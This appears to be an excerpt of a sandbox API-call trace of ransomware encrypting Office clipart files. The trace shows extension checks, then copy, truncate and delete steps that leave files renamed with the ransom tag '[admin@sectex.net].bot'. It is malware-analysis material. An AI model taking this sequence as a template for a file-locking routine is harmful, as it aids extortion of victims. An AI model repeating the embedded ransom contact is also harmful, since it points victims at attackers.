	[0156.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.536] lstrlenW (lpString=".rar") returned 4
	[0156.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.536] lstrlenW (lpString=".bz2") returned 4
	[0156.536] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.536] lstrlenW (lpString=".7z") returned 3
	[0156.536] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.536] lstrlenW (lpString=".dbf") returned 4
	[0156.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.536] lstrlenW (lpString=".1cd") returned 4
	[0156.536] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.536] lstrlenW (lpString=".jpg") returned 4
	[0156.536] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.536] lstrlenW (lpString=".doc") returned 4
	[0156.536] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.536] lstrlenW (lpString=".docx") returned 5
	[0156.536] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0156.536] lstrlenW (lpString=".pdf") returned 4
	[0156.536] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.537] lstrlenW (lpString=".xls") returned 4
	[0156.537] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.537] lstrlenW (lpString=".xlsx") returned 5
	[0156.537] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0156.537] lstrlenW (lpString=".ppt") returned 4
	[0156.537] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.537] lstrlenW (lpString=".zip") returned 4
	[0156.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.537] lstrlenW (lpString=".rar") returned 4
	[0156.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.537] lstrlenW (lpString=".bz2") returned 4
	[0156.537] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.537] lstrlenW (lpString=".7z") returned 3
	[0156.537] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.537] lstrlenW (lpString=".dbf") returned 4
	[0156.537] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.537] lstrlenW (lpString=".1cd") returned 4
	[0156.537] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned 63
	[0156.537] lstrlenW (lpString=".jpg") returned 4
	[0156.537] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.538] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.538] lstrlenW (lpString="J0105282.WMF") returned 12
	[0156.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0156.673] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4796) returned 1
	[0156.674] CloseHandle (hObject=0x25c) returned 1
	[0156.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf")) returned 0x20
	[0156.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0156.674] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.688] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.689] GetLastError () returned 0x0
	[0156.689] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x12bc, lpOverlapped=0x0) returned 1
	[0156.713] WriteFile (in: hFile=0x3b0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x12c0, lpOverlapped=0x0) returned 1
	[0156.713] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.713] WriteFile (in: hFile=0x3b0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.714] SetEndOfFile (hFile=0x3b0) returned 1
	[0157.318] CloseHandle (hObject=0x3b0) returned 1
	[0157.843] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.843] SetEndOfFile (hFile=0x25c) returned 1
	[0158.372] CloseHandle (hObject=0x25c) returned 1
	[0158.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.396] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf")) returned 1
	[0158.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.396] lstrlenW (lpString=".doc") returned 4
	[0158.396] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.396] lstrlenW (lpString=".docx") returned 5
	[0158.396] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0158.396] lstrlenW (lpString=".pdf") returned 4
	[0158.396] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.396] lstrlenW (lpString=".xls") returned 4
	[0158.396] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.396] lstrlenW (lpString=".xlsx") returned 5
	[0158.397] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0158.397] lstrlenW (lpString=".ppt") returned 4
	[0158.397] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.397] lstrlenW (lpString=".zip") returned 4
	[0158.397] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.397] lstrlenW (lpString=".rar") returned 4
	[0158.397] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.397] lstrlenW (lpString=".bz2") returned 4
	[0158.397] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.397] lstrlenW (lpString=".7z") returned 3
	[0158.397] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.397] lstrlenW (lpString=".dbf") returned 4
	[0158.397] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.397] lstrlenW (lpString=".1cd") returned 4
	[0158.397] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.397] lstrlenW (lpString=".jpg") returned 4
	[0158.397] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.397] lstrlenW (lpString=".doc") returned 4
	[0158.397] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.397] lstrlenW (lpString=".docx") returned 5
	[0158.397] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0158.397] lstrlenW (lpString=".pdf") returned 4
	[0158.397] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.397] lstrlenW (lpString=".xls") returned 4
	[0158.398] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.398] lstrlenW (lpString=".xlsx") returned 5
	[0158.398] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0158.398] lstrlenW (lpString=".ppt") returned 4
	[0158.398] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.398] lstrlenW (lpString=".zip") returned 4
	[0158.398] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.398] lstrlenW (lpString=".rar") returned 4
	[0158.398] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.398] lstrlenW (lpString=".bz2") returned 4
	[0158.398] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.398] lstrlenW (lpString=".7z") returned 3
	[0158.398] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.398] lstrlenW (lpString=".dbf") returned 4
	[0158.398] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.398] lstrlenW (lpString=".1cd") returned 4
	[0158.398] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF") returned 63
	[0158.398] lstrlenW (lpString=".jpg") returned 4
	[0158.398] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.398] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.398] lstrlenW (lpString="J0105332.WMF") returned 12
	[0158.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0158.399] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=10508) returned 1
	[0158.399] CloseHandle (hObject=0x3f0) returned 1
	[0158.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf")) returned 0x20
	[0158.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0158.400] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.400] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0158.401] GetLastError () returned 0x0
	[0158.401] ReadFile (in: hFile=0x3f0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x290c, lpOverlapped=0x0) returned 1
	[0158.486] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2910, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2910, lpOverlapped=0x0) returned 1
	[0158.487] ReadFile (in: hFile=0x3f0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.487] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.487] SetEndOfFile (hFile=0x1d8) returned 1
	[0158.490] CloseHandle (hObject=0x1d8) returned 1
	[0158.490] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.490] SetEndOfFile (hFile=0x3f0) returned 1
	[0158.492] CloseHandle (hObject=0x3f0) returned 1
	[0158.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.493] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf")) returned 1
	[0158.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.493] lstrlenW (lpString=".doc") returned 4
	[0158.493] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.493] lstrlenW (lpString=".docx") returned 5
	[0158.493] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0158.493] lstrlenW (lpString=".pdf") returned 4
	[0158.493] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.493] lstrlenW (lpString=".xls") returned 4
	[0158.493] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.494] lstrlenW (lpString=".xlsx") returned 5
	[0158.494] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0158.494] lstrlenW (lpString=".ppt") returned 4
	[0158.494] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.494] lstrlenW (lpString=".zip") returned 4
	[0158.494] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.494] lstrlenW (lpString=".rar") returned 4
	[0158.494] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.494] lstrlenW (lpString=".bz2") returned 4
	[0158.494] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.494] lstrlenW (lpString=".7z") returned 3
	[0158.494] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.494] lstrlenW (lpString=".dbf") returned 4
	[0158.494] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.494] lstrlenW (lpString=".1cd") returned 4
	[0158.494] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.494] lstrlenW (lpString=".jpg") returned 4
	[0158.494] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.494] lstrlenW (lpString=".doc") returned 4
	[0158.494] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.494] lstrlenW (lpString=".docx") returned 5
	[0158.494] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0158.494] lstrlenW (lpString=".pdf") returned 4
	[0158.494] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.495] lstrlenW (lpString=".xls") returned 4
	[0158.495] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.495] lstrlenW (lpString=".xlsx") returned 5
	[0158.495] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0158.495] lstrlenW (lpString=".ppt") returned 4
	[0158.495] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.495] lstrlenW (lpString=".zip") returned 4
	[0158.495] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.495] lstrlenW (lpString=".rar") returned 4
	[0158.495] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.495] lstrlenW (lpString=".bz2") returned 4
	[0158.495] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.495] lstrlenW (lpString=".7z") returned 3
	[0158.495] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.495] lstrlenW (lpString=".dbf") returned 4
	[0158.495] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.495] lstrlenW (lpString=".1cd") returned 4
	[0158.495] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned 63
	[0158.495] lstrlenW (lpString=".jpg") returned 4
	[0158.495] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.495] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.495] lstrlenW (lpString="J0105348.WMF") returned 12
	[0158.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0158.496] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=17060) returned 1
	[0158.496] CloseHandle (hObject=0x3f0) returned 1
	[0158.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf")) returned 0x20
	[0158.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0158.497] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.497] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0158.497] GetLastError () returned 0x0
	[0158.497] ReadFile (in: hFile=0x3f0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x42a4, lpOverlapped=0x0) returned 1
	[0158.525] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x42b0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x42b0, lpOverlapped=0x0) returned 1
	[0158.526] ReadFile (in: hFile=0x3f0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.526] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.526] SetEndOfFile (hFile=0x1d8) returned 1
	[0158.526] CloseHandle (hObject=0x1d8) returned 1
	[0158.526] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.526] SetEndOfFile (hFile=0x3f0) returned 1
	[0158.529] CloseHandle (hObject=0x3f0) returned 1
	[0158.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf")) returned 1
	[0158.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.612] lstrlenW (lpString=".doc") returned 4
	[0158.612] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.612] lstrlenW (lpString=".docx") returned 5
	[0158.612] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.613] lstrlenW (lpString=".pdf") returned 4
	[0158.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.613] lstrlenW (lpString=".xls") returned 4
	[0158.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.613] lstrlenW (lpString=".xlsx") returned 5
	[0158.613] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.613] lstrlenW (lpString=".ppt") returned 4
	[0158.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF") returned 63
	[0158.613] lstrlenW (lpString=".zip") returned 4
	[0158.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.613] lstrlenW (lpString=".rar") returned 4
	[0158.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.613] lstrlenW (lpString=".bz2") returned 4
	[0158.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.613] lstrlenW (lpString=".7z") returned 3
	[0158.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
